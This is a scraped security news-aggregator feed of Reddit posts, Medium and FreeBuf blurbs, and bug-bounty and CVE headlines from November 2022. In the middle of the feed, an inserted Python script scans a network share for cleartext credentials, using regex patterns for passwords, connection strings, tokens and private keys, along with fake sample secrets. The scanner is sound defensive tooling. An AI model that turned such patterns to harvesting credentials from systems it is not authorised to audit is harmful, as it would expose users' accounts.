    How do you follow up for clarification with Google's Bug Hunters system if they closed the case? See my previous post here and on cryptocurrency for the preface to this. A report was made on the suspicious timing coincidence of granting a popular Google Play app Google identification instead of Facebook or email sign-up. This was the reply received from the Google Bug Hunters program: "Status: Won't Fix (Intended Behavior) Hi! Thank you for contacting us. We've determined that what you're reporting is not a technical security vulnerability. As we won't be able to act on your report, we have closed the case – from now on, we won't be able to see any of your responses." Needless to say we're both a little flabbergasted that such a detailed report involving the theft of some cryptocurrency from somebody's Google Drive, which apparently occurred after a Play Store app was given normal Google identification sign-up privileges, was dismissed as intended behavior. Anyway, do you have to open another issue or bug report to get clarification on whether they mean that it is intended behavior for any app that you sign up with using Google sign-up to be able to access all files on your Google Drive if they want to? I mean, I would find that a little shocking if that is the intended behavior, but if it is they sure as hell need to tell a lot of people about it. And since the issue was closed and they say they won't see any more responses to this issue, I'm wondering how to get clarification on that. submitted by /u/GWtech
    How many courses do you need to complete to become a pen tester?
    Hi. I'm curious as to how many courses in Hack The Box Academy I have to complete in order to become a pen tester. What are all of the courses recommended in Hack The Box Academy to be a pen tester? submitted by /u/AlternativeNo5023
    How do I write a "project proposal" for a security-conscious enterprise company to open internal web access on their internal cloud?
    I use NetBox, which is a Django 3.3 app, to inventory our department's network equipment. I need to productionize this so other people in our department can access this and use it on our company's internal cloud. Unfortunately when I tried to deploy it on our internal cloud, the corporate security controls came in. I'm a contractor and the fleeting advice I got from the FTE was "write a project proposal." I have no idea what a "project proposal" looks like in this context but I have some ideas of its components. I just want holes poked in the firewall to access my webapp barfing out what NetBox does, which seems explanatory, but not OAuthing (oof) it into the company security certificates, VM updates, Django updates??, transport security between the DB and the web server even though that's given to us. I have no idea what a "project proposal" looks like in these circumstances and I have no idea how to write this down in a way that makes sense. submitted by /u/combuchan
    How do I put all the achievements I have done at work on my resume?
    My performance review is next month. I may go find a new position if my salary raise is not good enough, especially as I am doing a fantastic job this year. Anyway, I am working at a bank right now as an application penetration tester. I have discovered two very critical findings this year for the bank (OS injection and an IDOR allowing me to log in to any user account). I also did a very, very great job of taking care of the bank's VDP and BBP program on HackerOne. And I also got three CVEs this year when pentesting the bank's applications. I want to put all these in my resume but I have no idea how to... Can someone help me out pls~~~ Resume: https://imgur.com/CrTUMns Edit: grammar submitted by /u/No-job-no-money
    [LIVE Nov 25, 2022 11AM PT] Off By One Security: Introduction to Linux Heap Exploitation
    submitted by /u/soupcreamychicken
    How Much Shuffling Can You Watch?
    submitted by /u/surftamer
    SecWiki News 2022-11-25 Review
    Research on information extraction techniques from a graph perspective, by ourren. For more recent articles, visit SecWiki
    Containers: Rootful, Rootless, Privileged and Super Privileged
    submitted by /u/fcano1
    Ice — THM (easy)
    Sequel to Blue, a Windows machine with poorly configured settings. Continue reading on Medium »
    Blue — THM (easy)
    Blue is a Windows hacking room for complete beginners, and here I'll walk you through the steps I followed to hack into this machine. Continue reading on Medium »
    OSINT: Searching for information about citizens of the Republic of Belarus
    Data from the State Register of Payers: information from the state register of taxpayers, such as the UNP (payer registration number) and the tax inspectorate code. Continue reading on Medium »
    Vulnerability disclosure that saved $100M worth of crypto
    Article URL: https://twitter.com/orenyomtov/status/1595815245666086913 Comments URL: https://news.ycombinator.com/item?id=33742541 (2 points, 0 comments)
    FuzzingWeekly CW 47
    Till REcollapse — Fuzzing the web for mysterious bugs: https://0xacb.com/2022/11/21/recollapse/ Continue reading on Medium »
    FreeBuf Weekly | UK and South Korea reach data transfer agreement; AirAsia loses information on 5 million passengers and employees
    Dear Buffers, happy weekend. Here is this week's FreeBuf Weekly, in which we summarise and recommend the week's hot news, security incidents, good reads and handy tools, so you don't miss any of this week's highlights!
    FreeBuf Morning Report | Cybersecurity maturity affects enterprise revenue growth; lack of digital trust leads nearly half of customers to abandon suppliers
    The UK has completed its first independent post-Brexit data protection decision, which will allow it to transfer personal data securely and without restriction to South Korea before the end of this year.
    How to use stegoWiper to defeat steganography-based malware attacks
    Over the past decade, many threat groups have used steganography-based malware or related steganographic techniques to attack different sectors and organisations in regions across the world.
    Citing "security risks", the UK stops using Chinese surveillance cameras; the Ministry of Foreign Affairs responds
    The Ministry of Foreign Affairs responded that China firmly opposes some people's over-broad application of the concept of national security to unreasonably suppress Chinese companies.
    Reverse engineering and dynamic debugging of an Android challenge
    The challenge comes from the Haidian District Network and Information Security Administrator Competition; the encryption/verification algorithm is packaged into a .so and called dynamically from the program via check.
    Cybercrime rampant: INTERPOL intercepts assets worth US$130 million
    In a global crackdown on cyber-enabled financial crime and money laundering, INTERPOL arrested nearly 1,000 suspects and seized virtual assets worth US$130 million.
    Exploring the limits of Runtime#exec from the JDK source
    Preface: I have run into various restrictions many times when calling Runtime.getRuntime().exec to pop a shell, and never properly understood the underlying principle, so this is mainly a summary and an analysis of the principles. Environment setup: use docker to start a Java service with a deserialization vulnerability (anything that can execute commands will do), then enable debugging. Here I directly use an existing WebLogic vulnerable environment and trigger the deserialization vulnerability by sending T3 protocol packets. Origin: what I used here is CVE-202
    Massive WhatsApp data leak: nearly 500 million user numbers for sale on the dark web
    According to Cybernews, a hacker is selling up-to-date mobile numbers of nearly 500 million WhatsApp users on an underground forum, and a check of a sample of the database suggests the data is very likely genuine.
    UK and South Korea complete first independent post-Brexit data transfer agreement
    By the end of 2022, the UK will be able to transfer personal data to South Korea without restriction.
    FuzzingWeekly CW47: Fuzzing the web for mysterious bugs
    Article URL: https://ioc.exchange/@FuzzingWeekly/109403898711416700 Comments URL: https://news.ycombinator.com/item?id=33740976 (1 point, 0 comments)
    From CloudSec to Web3 Security, Bug Bounties to DFIR, and More: 15 Power-Packed Talks at IWCON2022
    What do pen testers wear to their jobs?
    Hi. I want to become a pen tester after college, and I would like to know what is the dress code for them? Especially if it’s working on site, or in the office, or even remote. submitted by /u/AlternativeNo5023 [link] [comments]
    Is it normal for phone camera indicator to turn on after startup? (Android 12)
    hey guys, I recently noticed that my phone's (android 12) video camera indicator always flashes on briefly before turning off, a few minutes after I turn my phone on. Does this happen for anyone else or should I be concerned about this? Sorry I would have asked this in another sub if possible but I didn't know of one that pertained to android security. submitted by /u/No_Trash_9832 [link] [comments]
    Hacker Playbook, Where Do I Start?
    So I am new to this and was told that I should look into Hackers Playbook as a good starting point. But I noticed there are three and wanted to ask if what would be the best book to start with. submitted by /u/Baromis [link] [comments]
    If you are signed into a restaurants public wi-fi can other people signed into that same wifi network sees what's inside your android phone or Chromebook?
    If you are signed into a public wi-fi like at a restaurant, can other people signed into that same wifi network sees what's in the files in your android phone or Chromebook? I always assumed people could sniff your post headers (if that they are called) but web traffic was https encrypted when it left your phone and there was definitely no way one could actually see the FILES on your phone. submitted by /u/GWtech [link] [comments]
    A text file was read either from an Android phone or from a Google Drive when a Chromebook and an Android phone were on a partly public Wi-Fi. Need to figure out how that happened and how to protect against it?
    A text file was read either from an Android phone or from a Google Drive when a Chromebook and an Android phone were on a partly public Wi-Fi. Need to figure out how that happened and how to protect against it? My friend lost a small amount of Bitcoin because in the text file was a very old address with a private key. That's how he knows the file was read. And he knows exactly when the Bitcoin transfer happened. It wasn't a large financial loss, but he's freaked because he wants to know if someone's able to read his Google Drive or read text on his phone when he's on a public Wi-Fi. The Chromebook had access to his Google Drive and his Android phone had access to his Google Drive, and the Android phone and the Chromebook were Google-linked together. There may have been a time when they…
  • Open

    Write-up: Authentication bypass via information disclosure @ PortSwigger Academy
    No content preview
    Defending against ransomware in the Cloud
    Is the Cloud more or less secure against ransomware ? Continue reading on InfoSec Write-ups »
    THE ANATOMY OF KERBEROS AUTHENTICATION (AD BASICS 0x1)
    No content preview
  • Open

    Moto E20 Readback Vulnerability
    Article URL: https://www.pentestpartners.com/security-blog/moto-e20-readback-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33735392 Points: 1 # Comments: 0
  • Open

    OSINT automation: using сustom functions for working with API requests in Google Sheets
    One of the main methods of automating OSINT is to use various APIs. Continue reading on Medium »
    OSINT — Searching for a ship
    Continue reading on Medium »
  • Open

    SecWiki News 2022-11-24 Review
    All about BAS by ourren; Android component security: drozer in practice by ourren; For more recent articles, visit SecWiki
  • Open

    HackerOne Advises Users to Safeguard From Legal Issues
    Want to Know How? Continue reading on Bug Zero »
    Web Application Bug Bounty Hunting LAB Setup Guide — Web Hacking Tutorial
    Web application vulnerabilities involve a system flaw or weakness in a web-based application. Create A Hacking Bug Bounty Hunting… Continue reading on Medium »
    Html File Upload Lead to A.T.O in Indonesian Government Site
    Hello Hunters 👋, let me introduce myself: I am a bug hunter, and I only look for holes or bugs when I have some free time. Continue reading on Medium »
    OAuth and the flaws in its implementation
    What is OAuth? Continue reading on Medium »
    Deploying an AWS S3 static site to use Cloudflare WAF
    Prerequisites Continue reading on Medium »
  • Open

    Developing SMB stager in Nim
    Hello fellow Red Teamers. I recently started getting in touch with Nim for offensive coding. To be honest I find it difficult and strange… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Pro-Russian group steals 50 million passwords; CISA updates guidance to improve infrastructure resilience
    After Anonymous Russia, part of the pro-Russian hacker group Killnet, claimed to have launched a DDoS (distributed denial-of-service) attack, the European Parliament's website was taken down.
    A rare move: Meta bans several US military sock-puppet accounts
    Meta recently banned several US military sock-puppet accounts, including accounts on Facebook, Instagram and other social platforms.
    Gathering in Shenzhen, the excitement continues! CIS 2022 conference (Shenzhen venue) held successfully
    Speakers and attendees from across the country gathered to exchange forward-looking ideas and experiences in the cybersecurity field face to face.
    European Parliament website attacked after the EU declares Russia a terrorist state
    Hours after the legislature declared Russia a terrorist state, KillNet launched a DDoS attack that took down the European Parliament's website.
  • Open

    Sigstore The Easy Way
    submitted by /u/Rewanth_Tammana [link] [comments]
    2022 InfoSec Black Friday Deals
    submitted by /u/Fugitif [link] [comments]
  • Open

    Apache OFBiz CVE-2021-29200 Deserialization Vulnerability Analysis
    Author: Moyun Technology VLab Team. Original link: https://mp.weixin.qq.com/s/cJ65VXdHzSelIptJ5TIW_A Vulnerability summary: On 24 March 2021, the Moyun Security V-Lab reported a deserialization vulnerability in the OFBiz product to Apache; on 28 April 2021, Apache OFBiz published its acknowledgement. Timeline: 24 March 2021: reported this vulnerability to Apache OFBiz 202...
  • Open

    What cloud collection applications do you use?
    As above. Looking at a solution to pull cloud data (Google Takeout, WhatsApp, icloud etc) submitted by /u/Genzlol [link] [comments]
    Advice for GCFE
    As the title says - I have 3+ years of experience in the field, and for the first time I am approaching one of the SANS certifications. Any advice on how to study for it? Are there any tips I should know or could use to improve my study? Not looking for cheating, but rather to optimize my time. Thanks submitted by /u/RobertJCorcoran [link] [comments]
    A good private investigation firm that handles national cases and does computer forensics?
    I have a police misconduct case for which I need services from technology professionals to help investigate. Can anyone recommend anyone? submitted by /u/bluemoss_co [link] [comments]
  • Open

    CGI::Cookie
    Ruby disclosed a bug submitted by htokumaru: https://hackerone.com/reports/1204977
    RubyCGIHTTPHTTP
    Ruby disclosed a bug submitted by htokumaru: https://hackerone.com/reports/1204695

  • Open

    CRTL - RTO2 Course/Exam Review
    submitted by /u/roobixx [link] [comments]
    Linux Password Mining - Extract passwords from files and memory
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    3rd party app to read MS Teams?
    Anyone know of a third party application that can view MS Teams chat? I have a handful of drive images and can see remnants from an .ldb file in the user profile (found during keyword search using Encase). I've had some success using Axiom, but was wondering if there's another tool available. I do not have access to any cloud repositories, so I'm sure I'll only see temp or cache leftovers, but anything helps. submitted by /u/IDrinkMyBreakfast [link] [comments]
    AFF4 extension for X-Ways stable?
    Hey folks, I've seen that X-Ways supports the AFF4 format through the I/O API. The mentioned release at https://github.com/aff4/aff4-cpp-lite/releases/tag/v2.1.1-pre is rather old. My question is: is it stable and safe enough to use on a daily basis for production? Do you have experience with it? Thanks in advance! submitted by /u/Reliable-Crux [link] [comments]
    What is unallocated $orphan file data ?
    Good morning! I've been learning a lot about digital forensics lately. I made a little test case for myself using VMs and I have a question that I cannot find the answer to. I did an ingest and analysis of a disk using Autopsy. I did a keyword search for a suspect IP of a C2 server. I got many hits in Autopsy. One of them is the name OUTLMIME.DLL and its location is img_c:/$OrphanFiles/OUTLMIME.DLL; this shows as unallocated. Strings output shows the IP along with other important information like user contact info. Created time shows October. Modified time shows a month later. Question: I would basically like to understand what this means. The orphan file contains many bits of data in its strings. Does this all come from a single file, or are these strings coming from different files that were present in the disk space and are now all smushed together in this unallocated orphan file? Is the date accurate or relevant? I mean, could I say that in October I observed that there was a file with data suggesting that a malicious IP was contacted and that personal information may have been sent? So many questions, but this would be a very helpful start. Thank you so much! submitted by /u/JimmyMcTrade [link] [comments]
  • Open

    Investigating a backdoored PyPi package targeting FastAPI applications
    submitted by /u/thorn42 [link] [comments]
    A dive into Microsoft Defender for Identity
    submitted by /u/jeandrew [link] [comments]
    Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice
    submitted by /u/CyberMasterV [link] [comments]
    Bringing PAC to x86 with custom microcode
    submitted by /u/Gallus [link] [comments]
  • Open

    On the Wire — Hacktoria Contract Walkthrough
    In this article, we are going to solve an OSINT challenge from Hacktoria called “On the Wire”. Continue reading on Medium »
    Create Sock Puppet Profile For OSINT Investigation
    It’s been a while since my last post in this blog. Two years back I got lost in OSINT, so I’ll post here what I’ve learned so far. Continue reading on Medium »
    OSINT — Searching for information on Russian citizens
    Wanted status: https://www.interpol.int/notice/search/wanted https://mvd.ru/wanted http://fsin.su/criminal/… Continue reading on Medium »
    OSINT — Searching for information on Ukrainian citizens
    Wanted status: https://www.interpol.int/notice/search/wanted https://ssu.gov.ua/u-rozshuku https://wanted.mvs.gov.ua/… Continue reading on Medium »
    OSINT — Searching for and analysing a subject by image, photo or face.
    A user's photograph can also be used to identify a person by matching it against existing databases… Continue reading on Medium »
    OSINT — Vehicle lookup services
    VIN01 — finds the VIN and uses it to show registration history, accident history, mileage, OSAGO insurance and much more. Continue reading on Medium »
    OSINT — Searching for information on a citizen/company of Kyrgyzstan
    register.minjust.gov.kg — the Ministry of Justice's electronic database of legal entities. Continue reading on Medium »
    Searching for a train
    OpenRailwayMap — a detailed online map of the world's railway infrastructure. Continue reading on Medium »
    Early warning system social media: Video stream documents live animal cruelty and domestic violence
    Live on the video streaming platform Twitch, a teenager abuses his mother, is abused himself, and then goes after his cat. The details… Continue reading on Medium »
    The rise of Sweden as Europe’s gun crime capital
    Sweden is often perceived as a safe place, with a low crime rate and progressive politics, this is, however, a misconception. Continue reading on Medium »
  • Open

    How To Exploit CSRF In DVWA — StackZero
    No content preview
    3 Videos About Web3 Hacking to Fast-Forward Your Cybersecurity Journey
    No content preview
  • Open

    SecWiki News 2022-11-23 Review
    No news updated today~ For more recent articles, visit SecWiki
  • Open

    Top 10 Security Tools for Bug Bounty Hunters
    Bug bounty hunting is a career that is known for the heavy use of security tools. These tools help hunters to find weaknesses and… Continue reading on Medium »
    Git Exposed — A brief overview of the vulnerability.
    When we attack an application in a black-box pentest, bug bounty or CTF, we cannot read the back-end source code… Continue reading on Medium »
    Mt Pelerin Double Transaction Bugfix Review
    Summary Continue reading on Immunefi »
    BITRA Comes To Azbit
    BITRA is the native currency of the BugSpace cybersecurity project. The team provides bug hunting services to large companies, ensuring… Continue reading on Azbit News »
    How To Exploit CSRF In DVWA — StackZero
    This tutorial will show you how to exploit a CSRF vulnerability in the DVWA. You will learn some techniques to inject a malicious form Continue reading on InfoSec Write-ups »
  • Open

    Some movies, series and animation till 2020.
    submitted by /u/eewo [link] [comments]
    ~11K Fonts
    submitted by /u/flappy-doodles [link] [comments]
    1000's of American Football Related Videos, in 27 OD's
    These are all from the same domain but I couldn't find a centralized index, (akamaized dot net server not found). Some have got thousands of directories, (mainly videos), while others appear empty. Some shared dupes too, but I only scratched the surface. I lumped these ones together as they're all American football teams, but using this search string, site:.akamaized.net intitle:"Index of/" I found some other results that I haven't checked out yet. https://aricardinals.akamaized.net/ Arizona Cardinals https://atlfalcons.akamaized.net/ Atlanta Falcons https://balravens.akamaized.net/ Baltimore Ravens https://bufbills.akamaized.net/ Buffalo Bills https://carpanthers.akamaized.net/ Carolina Panthers https://chibears.akamaized.net/ Chicago Bears https://cinbengals.akamaized.net/ Cincinnati Bengals https://clebrowns.akamaized.net/ Cleveland Browns https://detlions.akamaized.net/ Detroit Lions https://denbroncos.akamaized.net/ Denver Broncos https://gbpackers.akamaized.net/ Green Bay Packers https://houtexans.akamaized.net/ Houston Texans https://indcolts.akamaized.net/ Indianapolis Colts https://jaxjaguars.akamaized.net/ Jacksonville Jaguars https://kcchiefs.akamaized.net/ Kansas City Chiefs https://larams.akamaized.net/ Los Angeles Rams https://oakraiders.akamaized.net/ Las Vegas Raiders https://miadolphins.akamaized.net/ Miami Dolphins http://nepatriots.akamaized.net/ New England Patriots https://nosaints.akamaized.net/ New Orleans Saints https://nyjets.akamaized.net/ New York Jets https://nflukent.akamaized.net/ NFL UK (looks empty) https://phieagles.akamaized.net/ Philadelphia Eagles https://pitsteelers.akamaized.net/ Pittsburgh Steelers https://sf49ers.akamaized.net/ San Francisco 49ers https://tbbuccaneers.akamaized.net/ Tampa Bay Buccaneers https://wasredskins.akamaized.net/ Washington Commanders (Redskins) submitted by /u/little_maggot [link] [comments]
  • Open

    DoS via Playbook
    Mattermost disclosed a bug submitted by vultza: https://hackerone.com/reports/1685979 - Bounty: $300
    DoS via Automatic Response Message
    Mattermost disclosed a bug submitted by vultza: https://hackerone.com/reports/1680241 - Bounty: $300
  • Open

    Username/password scanner for network share
    Good day, we found some files within our share that had creds of users... Do any scripts or software exist to scan a network share for possible credentials stored in clear text? I'm sure everyone is in the same boat... Even if you do awareness, it is so easy for them to stick the user/pw in a notepad... ;) Thanks for any tips in clearing out our shares! submitted by /u/unm3 [link] [comments]
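    An added example (not code from the post or from any named tool) of the kind of scanner being asked for: it walks a mounted share, triages files by extension, size and NUL bytes, greps the text files for credential patterns, skips template values such as password=<enter here>, and masks the secret in its own report so the findings list does not become a second credential dump. The patterns, directory names and file contents below are constructed for the demo; on a real share you would point scan_tree at the mount point.

```python
import os
import re
import tempfile
from pathlib import Path

# Ordered so the most specific pattern wins; the LAST capture group is the secret to mask.
# All patterns and sample files in this example are constructed for the demo.
CRED_PATTERNS = [
    ("connection string", re.compile(r"\b(Server|Data Source)=[^;]+;.*\bPassword=([^;]+)", re.I)),
    ("net use with password", re.compile(r"\bnet\s+use\b.+/user:\S+\s+(\S+)", re.I)),
    ("api key or token", re.compile(r"\b(api[_-]?key|secret|token)\s*[:=]\s*(\S{8,})", re.I)),
    ("password assignment", re.compile(r"\b(password|passwd|pwd|pass)\s*[:=]\s*(\S+)", re.I)),
    ("private key", re.compile(r"-----BEGIN (?:RSA |OPENSSH |EC )?PRIVATE KEY-----")),
]
# Values that are templates or variable references, not secrets: <password>, $env:PW, %PW%, {{pw}}, ****, xxx
PLACEHOLDER = re.compile(r"^[<\[{$%*]|^x{3,}$", re.I)
TEXT_SUFFIXES = {"", ".txt", ".ini", ".cfg", ".conf", ".config", ".xml", ".json", ".yml", ".yaml",
                 ".ps1", ".bat", ".cmd", ".sh", ".vbs", ".csv", ".log", ".env", ".md"}
MAX_BYTES = 5 * 1024 * 1024  # shares are full of ISOs and backups; skip anything big


def looks_like_text(path: Path) -> bool:
    """Cheap triage: known extension, modest size, no NUL bytes in the first KB."""
    if path.suffix.lower() not in TEXT_SUFFIXES or path.stat().st_size > MAX_BYTES:
        return False
    with path.open("rb") as fh:
        return b"\x00" not in fh.read(1024)


def redact(line: str, m: "re.Match") -> str:
    """Mask the captured secret so the findings report is safe to circulate."""
    if m.lastindex:
        start, end = m.span(m.lastindex)
        return line[:start] + "***" + line[end:]
    return line


def scan_file(path: Path) -> list:
    findings = []
    with path.open("r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for kind, pat in CRED_PATTERNS:
                m = pat.search(line)
                if not m:
                    continue
                if m.lastindex and PLACEHOLDER.match(m.group(m.lastindex)):
                    break  # template value, not a credential
                findings.append({"path": str(path), "line": lineno, "kind": kind,
                                 "preview": redact(line.rstrip("\n"), m)})
                break  # one finding per line is enough
    return findings


def scan_tree(root) -> list:
    """Walk a mounted share (or any directory) and return credential findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            try:
                if looks_like_text(p):
                    findings.extend(scan_file(p))
            except OSError:
                continue  # unreadable file; log it in a real run and move on
    return sorted(findings, key=lambda f: (f["path"], f["line"]))


SAMPLE_FILES = {  # constructed content standing in for what turns up on a real share
    "IT/onboarding.txt": "Wifi: CorpNet\npassword: Winter2022!\n",
    "scripts/map_drive.bat": "net use Z: \\\\fileserver\\finance /user:CORP\\svc_backup Backup#2022\n",
    "apps/web.config": '<add name="db" connectionString="Server=sql01;Database=crm;User Id=sa;Password=P@ss;" />\n',
    "docs/template.ini": "password=<enter password here>\n",          # placeholder, must be ignored
    "keys/id_rsa": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAA\n-----END OPENSSH PRIVATE KEY-----\n",
    "backup/disk.bin": None,                                           # binary, must be skipped
}


def build_sample_tree() -> str:
    """Create the constructed share layout in a temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="share-")
    for rel, content in SAMPLE_FILES.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        if content is None:
            p.write_bytes(b"\x00\x01\x02" * 1024)
        else:
            p.write_text(content, encoding="utf-8")
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f['path']}:{f['line']} [{f['kind']}] {f['preview']}")
```

    Run it against the mount point (or a staged copy) rather than file by file over SMB, extend CRED_PATTERNS with whatever your own shares turn up, and treat every finding as a credential to rotate, not just a file to delete.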
    What are some things that can be automated for SOC analysts?
    I have an interview coming up and they want someone who can help them be more efficient with automation. What would be examples of things a SOC would need to be automated? submitted by /u/murderkarma [link] [comments]
    System for cybersecurity homelab
    Currently I’m working as a sysadmin with about 4 yrs of exp and planning to shift to cybersec/netsec. Planning to get a refurbished Dell OptiPlex 3040 i3 6th gen, or should I go for an OptiPlex 3020 i5 4th gen at the same price, for running tools for learning purposes? Since I still need to start, I'm not sure if it will be able to handle it, but since a mini PC is available currently, I'm planning to have one in inventory. submitted by /u/beingbaban [link] [comments]
    Lab network question
    So I have a fairly beefy Intel NUC that I'm using as a lab machine. The last upgrade I needed to make was on the SSD and I'm doing that. This is for a group so we can bring it to group events for people to mess around with. I've run something similar before and had issues when we tried to get a number of people attacking on the same network. I'm wondering, for anyone who has done anything like that, how many hosts can you get attacking before the network gets bogged down? I think it was the network vice the machines themselves. I'm guessing it's going to depend on the network hardware, but IDK. submitted by /u/sephstorm [link] [comments]
  • Open

    CVE-2022-42889 Apache Commons Text RCE Vulnerability Analysis
    Author: xxhzz@Xinglan Technology PortalLab. Original link: https://mp.weixin.qq.com/s/5B8MjKNB9UrsV6D-dKwTng Preface: Recently I have been maintaining and updating a newly developed command-line scanner for automated Web/API vulnerability fuzzing (tool address: https://github.com/StarCrossPortal/scalpel); the scanner has now been updated to its third version, adding 5 new 202...
  • Open

    OSINT automation for hackers
    BBOT is a recursive, modular OSINT framework inspired by Spiderfoot and written in Python. Continue reading on Medium »

  • Open

    Places to find a mentor?
    Does anyone have any resources or places to possibly find a mentor for the IR space? I’m an early professional, and started on an IR team a few months ago and am looking for a mentor to guide me more of the technical aspects of DFIR. Thanks! submitted by /u/hoolahoop222 [link] [comments]
    Workflows / Organization / Tools of Found Data
    Long story short: My father died last month leaving a large mass of data across 20+ devices (e.g,. computers, thumb drives, backup drives, cloud, etc). I am trying to aggregate and sort through all of this data to find nonduplicate relevant data. As I am sure people in this sub do plenty of large-scale data discovery, I am hoping someone might cue me into best practices for aggregating / sorting / culling / archiving data in a situation like this. Any resources / workflows / tools / processes or directions you might offer would be greatly appreciated. Thanks in advance. submitted by /u/officespace2 [link] [comments]
    Ways to brush up and maintain computer forensics skills
    Some years ago, I acquired an AS in computer forensics. Unfortunately, I do not get to use what I learned on a daily basis. Are there any websites or products that can help me stay updated and educated with sample cases? Or should I just buy an updated college level computer forensics book and use the sample cases provided therein. Thoughts and suggestions greatly appreciated. submitted by /u/lexispots [link] [comments]
    evidence a live USB was used?
    Curious what your experience is with finding evidence that someone booted from a live OS USB. Is there anything that could point to this being done? I was thinking besides seeing the creation USB tools on the machine, you might notice if they turned off any USB protection/live boot security settings in the bios. But if they remembered to turn it back on, I'm not sure this would be detectable? submitted by /u/CrazyKitty2016 [link] [comments]
    Investigating Infected Windows with Volatility Framework | TryHackMe
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Taxii IOC Feeds
    Looking to ingest some additional IOCs into my MS Sentinel instance. Any good Taxii IOC feeds you'd recommend? submitted by /u/Itchy-Criticism-5470 [link] [comments]
    What is the best way to make the most money as a Security Analyst?
    I am currently working as a mid-level Security Analyst and have been doing so for some time now. The job is great but I want to make sure that I'm making the most money that I can while I work as an analyst. I'm willing to look into working for other companies but I don't want to be someone who travels a ton for my work so I'd rather avoid jobs that require that. How can a Security Analyst make the most money doing what they do? submitted by /u/0wlBear916 [link] [comments]
    Fake it until you make it. What do?
    Using buzzwords I got myself a Junior Network Engineer job (I have a business economics degree). I really like this field, but apart from some random Udemy courses (aka pay 10$ not to Google stuff), I feel like I am totally unprepared. They require: - Experience in networking architectures and systems. - Knowledge of network security management (IPS, IDS). - Knowledge of L2 and L3 protocols. Is there a way to shock therapy those concepts into my mind asap? Thanks. submitted by /u/MonteNegro_42069 [link] [comments]
    I am looking for a new blue team cert
    Hello everyone, I am looking for a new blue team cert, but I do have a budget of below $1,000. I just completed the blue team level 1 cert, CYSA+ and ISC2 Certified in Cybersecurity (for fun because it was free). Any suggestions on what I can do next? I really like blue teaming and threat hunting, and since it is Black Friday, I am looking for more training. submitted by /u/Sgtkeebler [link] [comments]
  • Open

    Fastly Subdomain Takeover $2000
    No content preview
    Bug Bounty Tips and Getting Persistence With Electron Applications
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    Must See Sites From The Depths of Dark Web!
    No content preview
  • Open

    The Rise of Web 3.0 Security
    Web3 Security introduction Continue reading on Medium »
    Working with a scope using Gowitness
    Gowitness is a useful application written in Golang by @leonjza. According to the gowitness documentation: Continue reading on Medium »
    Interesting Stored XSS via meta data
    Back in February of this year, Bibek Neupane and I hacked on a private bug bounty program on HackerOne; we had chosen one of the social… Continue reading on Pentester Nepal »
    SSRF via DNS Rebinding (CVE-2022–4096)
    Hello everyone, I am Basavaraj. Today in this write-up I will explain my 2nd CVE, i.e. CVE-2022–4096 Continue reading on Medium »
    OTP BYPASS WithOUT RESPONSE MANIPULATION
    Hi, all! Scriptkiddie is back with a new hacking story. So a few days ago, I was hunting on one of the websites where I was able to bypass… Continue reading on Medium »
    Bug Bounty Tips and Getting Persistence With Electron Applications
    By repacking asar files, electron applications, and other bug bounty tips. Starring Signal, Discord, Nordpass, and more Continue reading on InfoSec Write-ups »
    Web Application Advanced Hacking
    A Hands-On Field Guide to latest techniques used by security researchers and bug bounty hunters Continue reading on Medium »
  • Open

    Disrupting an attacker publishing malware to PyPI
    submitted by /u/braincaviar [link] [comments]
    Burp Suite and Protobuf
    submitted by /u/0xdea [link] [comments]
  • Open

    Vulnerable SDK components lead to supply chain risks in IoT and OT environments
    submitted by /u/SCI_Rusher [link] [comments]
    A Dissection Of Nighthawk C2
    submitted by /u/Diesl [link] [comments]
  • Open

    Red Team Fundamentals Write Up
    Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber… Continue reading on Medium »
  • Open

    SecWiki News 2022-11-22 Review
    Restoring and analysing system images in investigative forensics by ourren; A first look at Java security: JavaAgent by the SecIN community; For more recent articles, visit SecWiki
  • Open

    Serious IT vulnerability found in MG's electric car
    Article URL: https://www.vibilagare.se/english/serious-it-vulnerability-found-mgs-electric-car Comments URL: https://news.ycombinator.com/item?id=33706128 Points: 1 # Comments: 0
  • Open

    Prisoner of War — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve an OSINT challenge called “Prisoner of War” from Hacktoria Continue reading on Medium »
  • Open

    Support Portal Takeover via Leaked API KEY
    AMBER AI disclosed a bug submitted by khizer47: https://hackerone.com/reports/1766228 - Bounty: $1500
  • Open

    Tenda AX12 Device Analysis
    Author: The_Itach1@Knownsec 404 Lab. Date: 22 November 2022. Device overview: The Tenda WiFi 6 dual-band wireless router operates in the 2.4 GHz and 5 GHz bands and supports 802.11ax, with a combined dual-band wireless rate of up to 2976 Mbps; it supports OFDMA, letting multiple users transmit in parallel at the same moment to improve throughput; it supports migrating the broadband account and password, so forgetting them when replacing an old router is not a problem; it supports IPv6 without address translation (N...
  • Open

    Oxeye Finds Bad Spotify Backstage JavaScript Vulnerability
    Article URL: https://thenewstack.io/oxeye-finds-bad-spotify-backstage-javascript-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=33699504 Points: 2 # Comments: 0
    Vulnerability in Tailscale allows a malicious website to access the peer API
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-005 Comments URL: https://news.ycombinator.com/item?id=33695818 Points: 2 # Comments: 0
    A Confused Deputy Vulnerability in AWS AppSync
    Article URL: https://securitylabs.datadoghq.com/articles/appsync-vulnerability-disclosure/ Comments URL: https://news.ycombinator.com/item?id=33694560 Points: 6 # Comments: 0
    ReDoS Vulnerability in Svnurl.py #287
    Article URL: https://github.com/pytest-dev/py/issues/287 Comments URL: https://news.ycombinator.com/item?id=33691134 Points: 1 # Comments: 1
  • Open

    How to look at the Amcache.hve file of a different computer
